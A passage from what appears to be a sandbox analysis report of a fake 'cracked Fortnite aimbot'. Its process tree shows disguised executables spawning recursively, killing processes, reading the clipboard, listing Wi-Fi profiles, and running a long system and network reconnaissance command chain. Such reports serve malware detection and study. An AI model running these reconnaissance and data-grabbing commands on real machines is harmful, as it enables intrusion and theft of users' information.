        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        45⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        46⤵
        
        PID:4360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        47⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        45⤵
        
        PID:5384

C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe
"C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe"
1⤵
- Checks computer location settings
PID:9188
- C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
  2⤵
  PID:8648
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    PID:4880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5604
- C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
  2⤵
  - Checks computer location settings
  PID:1052
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    PID:780
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      PID:1316
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5084
- - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
    3⤵
    PID:8508
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      PID:8928
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        
        PID:2804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:7440
  - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
      "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
      4⤵
      Checks computer location settings
      PID:6296
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        
        PID:7264
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        
        PID:8112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:6004
    - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        5⤵
        Checks computer location settings
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        
        PID:3760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:5416
      - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        6⤵
        Checks computer location settings
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        8⤵
        
        PID:3668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        7⤵
        Checks computer location settings
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        8⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        9⤵
        
        PID:7372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:7940
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        8⤵
        Checks computer location settings
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        9⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        10⤵
        
        PID:5576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        11⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        9⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        10⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        11⤵
        
        PID:6204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        10⤵
        Checks computer location settings
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        11⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        12⤵
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        13⤵
        
        PID:8592
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        11⤵
        Checks computer location settings
        
        PID:9196
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        12⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        13⤵
        
        PID:4648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        12⤵
        Checks computer location settings
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        13⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        14⤵
        
        PID:8596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        15⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        13⤵
        Checks computer location settings
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        14⤵
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        15⤵
        
        PID:2068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        14⤵
        Checks computer location settings
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        15⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        16⤵
        
        PID:1056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        17⤵
        
        PID:9096
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        15⤵
        Checks computer location settings
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        16⤵
        
        PID:7940
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        17⤵
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        16⤵
        Checks computer location settings
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        17⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        18⤵
        
        PID:6052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        19⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        17⤵
        Checks computer location settings
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        18⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        19⤵
        
        PID:5660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        20⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        18⤵
        Checks computer location settings
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        19⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        20⤵
        
        PID:7132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        21⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        19⤵
        Checks computer location settings
        
        PID:7336
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        20⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        21⤵
        
        PID:8984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        22⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        20⤵
        Checks computer location settings
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        21⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        22⤵
        
        PID:7204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        23⤵
        
        PID:4636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        23⤵
        
        PID:5484
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        23⤵
        
        PID:1012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        24⤵
        
        PID:5056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        23⤵
        
        PID:3600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        23⤵
        
        PID:4504
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        24⤵
        Enumerates processes with tasklist
        
        PID:4548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        23⤵
        
        PID:4648
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        24⤵
        
        PID:7320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        23⤵
        
        PID:8912
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        24⤵
        
        PID:2380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        23⤵
        
        PID:6492
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        24⤵
        Enumerates processes with tasklist
        
        PID:6056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /query /TN "ExelaUpdateService""
        23⤵
        
        PID:6456
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "ExelaUpdateService"
        24⤵
        
        PID:4368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        23⤵
        
        PID:8528
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        24⤵
        Enumerates processes with tasklist
        
        PID:6344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7856"
        23⤵
        
        PID:6776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7856
        24⤵
        Kills process with taskkill
        
        PID:6640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5124"
        23⤵
        
        PID:1052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5124
        24⤵
        Kills process with taskkill
        
        PID:7036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7368"
        23⤵
        
        PID:1524
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7368
        24⤵
        Kills process with taskkill
        
        PID:7540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 8268"
        23⤵
        
        PID:7580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 8268
        24⤵
        Kills process with taskkill
        
        PID:5220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3220"
        23⤵
        
        PID:7652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3220
        24⤵
        Kills process with taskkill
        
        PID:4252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7100"
        23⤵
        
        PID:6244
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7100
        24⤵
        Kills process with taskkill
        
        PID:9128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5380"
        23⤵
        
        PID:7868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5380
        24⤵
        Kills process with taskkill
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7172"
        23⤵
        
        PID:7536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7172
        24⤵
        Kills process with taskkill
        
        PID:7768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3900"
        23⤵
        
        PID:5172
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3900
        24⤵
        Kills process with taskkill
        
        PID:6932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        23⤵
        
        PID:7620
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        24⤵
        
        PID:2172
        
        C:\Windows\system32\chcp.com
        
        chcp
        25⤵
        
        PID:7280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        23⤵
        
        PID:7664
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        24⤵
        
        PID:5048
        
        C:\Windows\system32\chcp.com
        
        chcp
        25⤵
        
        PID:7688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        23⤵
        
        PID:8984
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        24⤵
        Enumerates processes with tasklist
        
        PID:1088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        23⤵
        Clipboard Data
        
        PID:6740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        24⤵
        Clipboard Data
        
        PID:9028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        23⤵
        Network Service Discovery
        
        PID:4260
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        24⤵
        Gathers system information
        
        PID:2564
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        24⤵
        
        PID:8968
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        24⤵
        Collects information from the system
        
        PID:8832
        
        C:\Windows\system32\net.exe
        
        net user
        24⤵
        
        PID:992
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        25⤵
        
        PID:6832
        
        C:\Windows\system32\query.exe
        
        query user
        24⤵
        
        PID:6216
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        25⤵
        
        PID:6860
        
        C:\Windows\system32\net.exe
        
        net localgroup
        24⤵
        
        PID:8748
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        25⤵
        
        PID:4604
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        24⤵
        
        PID:4212
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        25⤵
        
        PID:6492
        
        C:\Windows\system32\net.exe
        
        net user guest
        24⤵
        
        PID:6608
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        25⤵
        
        PID:6448
        
        C:\Windows\system32\net.exe
        
        net user administrator
        24⤵
        
        PID:8572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        25⤵
        
        PID:3192
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        24⤵
        
        PID:5588
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        24⤵
        Enumerates processes with tasklist
        
        PID:5312
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        24⤵
        Gathers network information
        
        PID:6628
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        24⤵
        
        PID:7232
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        24⤵
        Network Service Discovery
        
        PID:6716
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        24⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:5964
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        24⤵
        Launches sc.exe
        
        PID:8488
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        24⤵
        Modifies Windows Firewall
        
        PID:7088
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        24⤵
        Modifies Windows Firewall
        
        PID:5908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        23⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1724
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        24⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        21⤵
        Checks computer location settings
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        22⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        23⤵
        
        PID:6360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        24⤵
        
        PID:6768
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        22⤵
        Checks computer location settings
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        23⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        24⤵
        
        PID:1604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        25⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        23⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        24⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        25⤵
        
        PID:8188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        26⤵
        
        PID:8496
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        24⤵
        
        PID:4180
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        25⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        26⤵
        
        PID:2572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        27⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        25⤵
        
        PID:5308
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        26⤵
        
        PID:7376

C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe
"C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe"
1⤵
PID:1540

C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe
"C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe"
1⤵
- Checks computer location settings
PID:7348
- C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
  2⤵
  PID:6352
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    PID:4360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:8232
- C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
  2⤵
  - Checks computer location settings
  PID:8388
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    PID:6584
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      PID:7088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:6780
- - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
    3⤵
    - Checks computer location settings
    PID:6540
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      PID:8936
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        
        PID:7884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
      "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
      4⤵
      Checks computer location settings
      PID:1824
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        
        PID:8596
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        
        PID:5788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:4544
    - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        5⤵
        Checks computer location settings
        
        PID:5940
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        
        PID:6452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:6608
      - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
